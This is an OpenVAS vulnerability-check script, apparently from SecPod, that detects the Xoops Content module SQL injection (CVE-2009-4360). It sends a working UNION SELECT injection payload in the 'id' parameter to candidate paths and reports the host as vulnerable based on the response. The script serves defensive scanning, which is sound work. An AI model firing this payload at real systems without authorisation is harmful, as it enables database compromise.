###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_xoops_content_module_sql_inj_vuln.nasl 6307 2009-12-24 16:07:29Z dec $
#
# Xoops Content Module SQL Injection Vulnerability
#
# Authors:
# Sujit Ghosal <sghosal@secpod.com>
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_id(900732);
  script_version("$Revision: 6248 $: 1.0");
  script_cve_id("CVE-2009-4360");
  script_bugtraq_id(37155);
  script_name("Xoops Content Module SQL Injection Vulnerability");
  desc = "
  Overview: This host is running Xoops and is prone to SQL Injection
  vulnerability.

  Vulnerability Insight:
  This flaw is caused due to improper sanitization of data inside 'Content'
  module within the 'id' parameter which lets the remote unauthenticated
  user to run arbitrary SQL Commands.

  Impact:
  Successful exploitation will let the remote attacker to execute arbitrary SQL
  queires to compromise the remote machine running the vulnerable application.

  Impact Level: Application

  Affected Software/OS:
  Xoops 'Content' Module 0.5

  Fix: Solution/Patch is not available as on 24th December 2009. For further
  updates refer,
  http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1611

  References:
  http://xforce.iss.net/xforce/xfdb/54489
  http://securityreason.com/exploitalert/7494
  http://www.packetstormsecurity.org/0911-exploits/xoopscontent-sql.txt

  CVSS Score:
    CVSS Base Score     : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P)
    CVSS Temporal Score : 6.7
  Risk factor: High";

  script_description(desc);
  script_summary("Check for the version of XOOPS");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2009 SecPod");
  script_family("Web application abuses");
  script_dependencies("find_service.nes");
  script_require_ports("Services/www", 80);
  exit(0);
}


include("http_func.inc");

xoopsPort = get_http_port(default:80);
if(!xoopsPort){
  exit(0);
}

if(!can_host_php(port:xoopsPort)){
  exit(0);
}

if(safe_checks()){
  exit(0);
}

foreach dir (make_list("/", "/xoops", "/cms", "/content", cgi_dirs()))
{
  sndReq = http_get(item: string(dir + "/modules/content/index.php?id=1"),
                    port: xoopsPort);
  rcvRes = http_send_recv(port:xoopsPort, data:sndReq);

  if("blockContent" >< rcvRes && "blockTitle" >< rcvRes)
  {
    request = http_get(item:dir+"/modules/content/index.php?id=-1+UNION+SELECT"+
                       "+1,2,3,@@version,5,6,7,8,9,10,11--", port:xoopsPort);
    response = http_send_recv(port:xoopsPort, data:request);

    if("Set-Cookie: " >< response && "PHPSESSID" >< response &&
                                          "path=/" >< response)
    {
      security_hole(xoopsPort);
      exit(0);
    }
  }
}
